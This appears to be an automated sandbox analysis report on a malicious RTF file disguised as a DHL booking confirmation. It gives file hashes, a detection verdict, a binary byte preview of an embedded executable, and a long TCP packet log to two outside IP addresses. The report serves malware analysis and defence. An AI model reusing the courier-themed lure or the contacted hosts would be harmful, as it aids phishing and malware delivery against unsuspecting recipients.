SHA1:	BCABAE5C0B3CA8E9558AD3F57C3A10E8B5AE6F74
SHA-256:	A98A739B9AB7B06BF2833F6EF4AA97DB1B7C2441365C7104E878C8B29BF90F74
SHA-512:	1CBC6440FE45B66E5A72A41312B1195E25B64EDE5F97BFDE98CD9FDCABE30C9434FCEED40282D2453B7B25823AAEF7CB26F4D910E1EBA6FB95FB2A83D3968D93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5`..............0.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Ho..p3......4........%..........................................&.(.........0..9........~.........,".r...p.....(....o....s............~.....+......0...........~.....+.."........0..!........(....r!..p~....o......t.....+......0..!........(....r1..p~....o......t.....+......0...........r5..p.+....0...........rA..p.+..".(.....^..}.....(.......(%.......(.......0..;........rQ..pr...p.(...........,..(......+..s......o .....(!.....*..0..I........r...pr...p.(.......

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	6.3156947663805925
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc
File size:	1380809
MD5:	f89f2bb301dfc15a5c610356985cd85c
SHA1:	add01248aa7c1ec894e05398d1a46721fa3da986
SHA256:	072e26aacdd14b3210884f383ea0fa6705fc2f37661f8fb651d75dbf355b70aa
SHA512:	44b051486e927067deba3842d423b120c4186fc3512804fb015e1f71a6dda7b5cfd56b3741578e8fee32565f147270103f415379ee146bc7fb33f8dd360dc784
SSDEEP:	12288:GC+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+CmEl5D:l999999999999999999999999zl5D
File Content Preview:	{\rtf51437\page11419927264400464@ApJnbSmEIkBYwPBr@-DysivyjzZmoIeCPiF<eh&&0_M-C_g--_-d,64>32997$Cv>yt=n5\|:%_>jn8%bm\mklP;=u\m3699.28.... .... ...... .... .... ....

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00140183h								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 12:53:25.777452946 CET	49165	80	192.168.2.22	67.199.248.11
Feb 24, 2021 12:53:25.791138887 CET	80	49165	67.199.248.11	192.168.2.22
Feb 24, 2021 12:53:25.791285992 CET	49165	80	192.168.2.22	67.199.248.11
Feb 24, 2021 12:53:25.791449070 CET	49165	80	192.168.2.22	67.199.248.11
Feb 24, 2021 12:53:25.810259104 CET	80	49165	67.199.248.11	192.168.2.22
Feb 24, 2021 12:53:25.911385059 CET	80	49165	67.199.248.11	192.168.2.22
Feb 24, 2021 12:53:25.911494970 CET	49165	80	192.168.2.22	67.199.248.11
Feb 24, 2021 12:53:26.106566906 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.141967058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:26.142040968 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.151026964 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.186956882 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:26.187015057 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:26.187037945 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.187102079 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.196530104 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.232887983 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:26.233068943 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.610579014 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.697401047 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.850507021 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.850605965 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.850625992 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.850989103 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851203918 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851227045 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851248980 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851280928 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851291895 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851300001 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851325989 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851360083 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851753950 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851789951 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851810932 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851828098 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851902008 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851994991 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.852257013 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.852294922 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.852317095 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.852327108 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.852334976 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.852370024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.852396965 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.879446030 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.885755062 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.885781050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.885853052 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.885941982 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.885978937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.885998011 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886009932 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886027098 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886033058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886054039 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886058092 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886082888 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886117935 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886284113 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886346102 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886348009 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886373043 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886394978 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886404991 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886425018 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886764050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886812925 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886862040 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886897087 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886907101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886923075 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886943102 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886960983 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887275934 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887309074 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887335062 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887351036 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887717962 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887770891 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887799025 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887836933 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887845993 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887868881 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887891054 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887892008 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887909889 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887938976 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887953997 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.888003111 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.903764963 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.920838118 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920886040 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920909882 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920939922 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920943022 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.920955896 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.920964956 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920979023 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.920986891 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920995951 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921020985 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921207905 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921233892 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921250105 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921256065 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921261072 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921278000 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921289921 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921338081 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921380043 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921428919 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921446085 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921463013 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921466112 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921499968 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921607018 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921632051 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921657085 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921658039 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921674967 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921679974 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921694040 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921714067 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921714067 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921736956 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921753883 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921771049 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921787024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921797991 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921806097 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921844959 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921881914 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.921933889 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.921967030 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922014952 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922086954 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922113895 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922130108 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922137022 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922149897 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922169924 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922215939 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922249079 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922262907 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922280073 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922296047 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922316074 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922322989 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922338963 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922360897 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922374964 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922384024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922401905 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922419071 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922435045 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922444105 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922475100 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922836065 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922879934 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922890902 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922902107 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922930002 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922934055 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922940969 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922955990 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.922981024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.922997952 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.923027992 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.923075914 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.923168898 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.923223972 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.924618006 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.938761950 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.938949108 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.938958883 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.938990116 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.939022064 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.939047098 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.939116001 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.955791950 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.955864906 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.955980062 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956167936 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956216097 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956255913 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956262112 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956274033 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956300974 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956367016 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956391096 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956413031 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956427097 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956444025 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956490993 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956546068 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956576109 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956619024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956649065 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956691027 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956721067 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956762075 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.956765890 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.956804037 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.959472895 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.959498882 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.959522963 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.959561110 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.959579945 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.959594965 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.959616899 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.959646940 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.959685087 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.959856033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.959887028 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.959917068 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.959943056 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.959954977 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.959988117 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960009098 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960057020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960066080 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960109949 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960177898 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960208893 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960244894 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960257053 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960258961 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960283995 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960304976 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960310936 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960329056 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960339069 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960390091 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960418940 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960441113 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960464954 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960489988 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960513115 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960532904 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960552931 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960772991 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960799932 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960850954 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960855961 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960874081 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960886002 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960896969 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960906982 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960920095 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960938931 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960952997 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.960966110 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.960974932 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.961000919 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.961015940 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.963054895 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.973922014 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.974031925 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.974061966 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.974102020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.974136114 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.974165916 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.974303007 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.991039038 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.991065025 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.991137028 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.991173983 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.991194963 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.991394997 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.991411924 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.991426945 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.991442919 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.991476059 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.991487026 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.991494894 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.991534948 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.991769075 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.991811991 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.991995096 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.992021084 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.992038012 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.992042065 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.992053032 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.992069960 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.995105982 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.995170116 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.995220900 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.995260000 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.995662928 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.995743990 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996022940 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996053934 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996083021 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996093988 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996098995 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996119976 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996134043 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996150017 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996160984 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996165037 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996180058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996192932 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996193886 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996211052 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996212959 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996227026 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996236086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996243000 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.996252060 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996270895 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.996287107 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.998459101 CET	49166	443	192.168.2.22	5.79.72.163
